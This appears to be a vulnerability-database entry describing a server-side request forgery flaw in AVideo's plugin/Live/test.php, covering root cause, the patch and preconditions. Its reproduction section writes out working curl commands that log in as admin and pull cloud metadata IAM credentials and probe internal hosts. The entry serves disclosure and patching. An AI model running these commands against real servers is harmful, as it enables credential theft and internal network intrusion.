AVideo - Server-Side Request Forgery in Live/test.php via statsURL Parameter
Description
AVideo through version 27.0 contains a server-side request forgery vulnerability in plugin/Live/test.php that allows authenticated administrators to read arbitrary URLs via the statsURL parameter, which lacks isSSRFSafeURL() validation and accepts requests to private IP ranges and cloud metadata endpoints. Attackers can exploit this by crafting requests to internal services, cloud metadata endpoints like 169.254.169.254, and localhost to retrieve sensitive information including IAM credentials, internal service responses, and network configuration details.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
1Patches
Vulnerability mechanics
Root cause
"Missing isSSRFSafeURL() validation in plugin/Live/test.php allows server-side request forgery to internal and cloud metadata endpoints."
Attack vector
An authenticated administrator sends a GET request to `plugin/Live/test.php` with a `statsURL` parameter pointing to an internal or cloud metadata endpoint (e.g., `http://169.254.169.254/latest/meta-data/iam/security-credentials/`). The endpoint only checks that the URL starts with `http` via a regex and does not invoke `isSSRFSafeURL()` [ref_id=1], so it fetches and returns the full response from private IP ranges, localhost, or cloud metadata services. This allows the attacker to read IAM credentials, internal service responses, and network configuration. The lack of CSRF token validation also makes the endpoint susceptible to cross-site request forgery [ref_id=1].
Affected code
The vulnerable endpoint is `plugin/Live/test.php`. The `statsURL` parameter is taken from `$_REQUEST` (line 11) and only validated with a trivial `/^http/` regex before being passed to `file_get_contents()`, `curl_exec()`, or `wget()` — none of which call the existing `isSSRFSafeURL()` function defined in `objects/functions.php:4025`. SSL verification is also disabled in both the stream context and the curl handler.
What the fix does
The patch adds a call to `isSSRFSafeURL()` after the existing regex check in `plugin/Live/test.php`, so URLs pointing to private/reserved IP ranges (127.0.0.0/8, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, 169.254.0.0/16, and IPv6 equivalents) are rejected before any fetch is attempted [ref_id=1]. Additionally, SSL verification is re-enabled in both the `file_get_contents` stream context and the `curl` handler, preventing man-in-the-middle attacks against HTTPS targets.
Preconditions
- authAttacker must have a valid admin session cookie
- networkTarget AVideo server must be reachable over the network
- inputThe statsURL parameter must be accepted via GET or POST
Reproduction
Step 1: Authenticate as admin and obtain session cookie ``` PHPSESSID=$(curl -s -c - 'https://target.com/objects/userLogin.json.php' \ -d 'user=admin&pass=adminpass' | grep PHPSESSID | awk '{print $7}') ``` Step 2: Read AWS cloud metadata (IAM credentials) ``` curl -b "PHPSESSID=${PHPSESSID}" \ 'https://target.com/plugin/Live/test.php?statsURL=http://169.254.169.254/latest/meta-data/iam/security-credentials/' ``` Step 3: Read IAM credentials for a specific role ``` curl -b "PHPSESSID=${PHPSESSID}" \ 'https://target.com/plugin/Live/test.php?statsURL=http://169.254.169.254/latest/meta-data/iam/security-credentials/MyRole' ``` Step 4: Scan internal services ``` curl -b "PHPSESSID=${PHPSESSID}" \ 'https://target.com/plugin/Live/test.php?statsURL=http://192.168.1.1:8080/' ```
Generated on Jun 21, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
2- github.com/WWBN/AVideo/security/advisories/GHSA-wxjx-r2j2-96fxmitrevendor-advisory
- www.vulncheck.com/advisories/avideo-server-side-request-forgery-in-live-test-php-via-statsurl-parametermitrethird-party-advisory
News mentions
0No linked articles in our index yet.